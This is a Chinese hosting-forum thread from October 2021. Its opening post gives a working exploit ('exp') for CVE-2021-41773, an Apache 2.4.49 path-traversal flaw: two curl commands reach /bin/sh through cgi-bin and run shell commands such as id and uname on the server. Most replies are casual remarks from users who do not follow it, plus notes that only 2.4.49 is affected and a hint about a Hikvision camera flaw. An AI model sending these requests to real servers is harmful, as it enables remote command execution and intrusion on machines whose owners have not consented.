全球主机交流论坛

标题: 新漏洞 [打印本页]

作者: spr1ng 时间: 2021-10-6 17:03
标题: 新漏洞
CVE-2021-41773升级为无码版命令执行[惊恐]

exp:
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

curl --data "A=|id>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

作者: Mr.Qin 时间: 2021-10-6 17:04
提示: 作者被禁止或删除内容自动屏蔽

作者: optimism 时间: 2021-10-6 17:05
还行

作者: acpp 时间: 2021-10-6 17:06
本帖最后由 acpp 于 2021-10-6 17:11 编辑

v2.4.49 就这版本的目录穿越吧

作者: 等1下™我老公呢 时间: 2021-10-6 17:07
看不懂就不参与了

作者: ccf 时间: 2021-10-6 17:10
Apache？不用这个...

作者: 笑花落半世琉璃 时间: 2021-10-6 17:11
看不懂说点听的懂得

作者: nmdwsm 时间: 2021-10-6 17:16
看不懂
zsbd

作者: LikeOracle 时间: 2021-10-6 17:19
我还以为甲骨文又出啥漏洞了

作者: tomcb 时间: 2021-10-6 17:21

Mr.Qin 发表于 2021-10-6 17:04
不觉明历

https://www.secrss.com/articles/34890

我用NGINX

作者: sunsun01 时间: 2021-10-6 17:22

看不懂就不参与了

作者: huang1dede 时间: 2021-10-6 17:25
说人话

作者: galesaur 时间: 2021-10-6 17:35
以为甲鱼文呢

作者: spr1ng 时间: 2021-10-6 18:10

acpp 发表于 2021-10-6 17:06
v2.4.49 就这版本的目录穿越吧

最近有个海康威视蛇摄像头的漏洞喜欢**的有福了

作者: imtoken 时间: 2021-10-6 18:12
此问题仅影响 Apache 2.4.49 而不是早期版本。

欢迎光临全球主机交流论坛 (https://fd.vvwvv.eu.org/)